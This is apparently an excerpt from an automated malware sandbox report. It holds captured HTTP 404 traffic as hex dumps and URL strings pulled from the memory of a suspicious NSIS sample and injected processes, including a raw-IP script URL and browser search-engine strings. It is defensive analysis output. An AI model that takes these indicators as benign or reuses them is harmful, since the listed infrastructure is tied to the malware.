          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:55:23 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:31 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:33 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:25:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:26:01 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=c570c0e56952311d05e6ddd9a42f969d; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 869Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 db 6e e4 36 0c 7d cf 57 28 7e ed c8 9e 74 93 b4 48 c7 53 60 b3 4d 81 02 db 04 4d ba 40 9f 0a d9 a2 6d 6d 24 51 90 38 37 a0 1f 5f d9 1e cf 2d 93 ec 26 31 40 88 34 c9 c3 db 99 9c 7e ba bd 7e f8 e7 ee 37 d6 90 d1 d3 93 49 fb 30 2d 6c 9d 27 60 f9 2c 24 d3 13 16 bf 49 03 42 f6 6a 67 1a 20 c1 ca 46 f8 00 94 27 33 aa f8 cf c9 13 37 5a 02 1b dd 0b 25 a9 c9 25 cc 55 09 bc 33 46 4c 59 45 4a 68 1e 4a a1 21 3f 4b c7 09 b3 c2 40 9e cc 15 2c 1c 7a 8a 70 5b 3c 52 a4 61 3a c9 fa f7 a0 4e 9f e7 b1 40 0a c9 b6 aa 45 65 25 2c 47 cc 62 85 5a e3 e2 f9 06 87 da 12 42 e9 95 23 85 f6 db c1 8f b0 5a a0 97 61 af d1 53 ce d9 8d 88 83 a2 0d 8c f3 e8 3a 70 fe 8e 58 6b 60 37 11 ad 0f d8 78 b5 b2 8f ac f1 50 e5 49 43 e4 c2 55 96 55 6d 54 5a 77 29 c2 a9 90 96 68 b2 32 84 5f 2b 61 94 5e e5 b7 0e ec 0f f7 c2 86 ab 0f e3 f1 28 8a 1a 9d 47 e5 bc 55 2e a3 72 d9 2a 3f 45 25 8a fa ef af b8 e9 85 58 1d 89 bd 88 ca c5 f1 a4 3b 74 4e 1d 2d f0 7c 52 c2 3c e8 3c 09 b4 d2 10 1a 00 7a b2 a2 2f 60 25 7a 76 7d 7f cf 6e 54 0c 7a 76 13 d9 fc c7 7f e7 5d 70 26 30 b4 92 c6 f9 8f 15 f8 46 76 81 91 1d e4 85 6b f7 b7 b5 52 a3 ec 7b 11 79 77 ed 43 fb cd a8 cb 1e ae 6f b3 37 de d1 65 ad 55 dd 50 04 ea 00 37 d6 3b 10 3d 18 d5 b5 b5 d5 de 88 14 16 ca c1 f0 f0 62 66 a5 86 57 37 d6 8e 55 a1 25 2e 16 10 d0 bc 08 b0 4f c2 07 30 4e 0b 02 f6 59 28 bb e1 e2 8b 54 6c 8b 75 88 2f b5 38 c9 1a 10 72 5d ad ff 53 a0 5c ed a0 4a 35 67 a5 16 21 e4 89 13 52 2a 5b 73 23 13 d6 21 e5 89 11 be 56 96 13 ba ab 8b b1 5b fe 32 c0 ee 64 79 5c 24 c7 f1 4a d4 11 8b 9f b3 b5 82 55 15 80 d6 76 30 fc 72 50 d6 8e 0f 8c 60 49 bc 04 4b e0 77 30 0f 71 9b 8b 64 7a 8b 2e 8c d8 43 a3 02 bb 13 35 b0 6b 9c 69 c9 fe 44 62 1f 81 dd 60 bc df e9 24 8b 39 07 28 cd d9 00 62 da a1 b8 45 0b 0c bc 47 cf db 45 c5 e9 93 e9 f9 f8 3c ae ed 6c e7 44 9b e5 6d 70 c4 00 53 90 65 51 78 98 95 25 84 c0 0c 2f 90 08 4d 1c 2b 59 1f 2b 99 4e d4 10 5e 09 56 09 de 44 6e c4 bf 99 9a b2 8f a2 7c 64 84 ec 93 08 4d 81 c2 cb 49 26 a6 6f af 95 95 91 7e a2 24 3e 0b 4f cb 82 9d 83 46 37 94 be ee 43 d9 df 61 af 66 bf b6 8e 95 59 1a 0f b4 21 e1 9e 23 5e bd 73 ec fd dc 12 68 9f b9 ad f7 0b 58 89 9e fd d1 33 3b f4 c9 a1 f4 ca 11 0b be ec 39 3d ef 82 32 37 f3 50 c6 1b 46 1a ec ea e9 d7 76 a8 ac 4f 7a 3e 5b 60 68 e5 3b a3 0b 44 0a e4 85 cb be 86 ad 91 16 91 41 1a 52 a3 ec 77 e2 d4 5a d5 0d 15 b8 6c 71 36 c6 2b 00 54 c0 c8 48 e0 5a ac 70 46 83 99 ba c7 5a be 02 25 2c 94 83 e1 e1 af 9e c2 35 8e 83 11 4a f3 0a bd c9 e6 42 2b 29 08 0e b2 4f ba 8b 3e 80 71 3a 3a d9 67 a1 ec 70 d8 e3 77 8d 2b 89 a0 87 4d f4 a4 2a 50 ae 5a 1e 35 64 f4 f4
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:26:03 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=642acd1bd4e5af4738220f65563c7d37; path=/; HttpOnlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 61 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 73 20 2d 2d 3e 0a 0a 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 7c 52 61 6c 65 77 61 79 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 35 30 30 2c 35 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 7c 50 6f 70 70 69 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 35 30 30 2c 35 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 56 65 6e 64 6f 72 20 43 53 53 20 46 69 6c 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 61 6f 73 2f 61 6f 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 6
          Source: help.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.119.101.137/ak_Address/Address.js
          Source: help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
          Source: help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: Lc8xQv8iZY.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Lc8xQv8iZY.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.348880659.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.323170503.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.368664553.0000000008260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: -ODfqI49.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: help.exe, 00000005.00000002.569785642.0000000004302000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: help.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?d0766413c666e394f861185086d7f52f
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
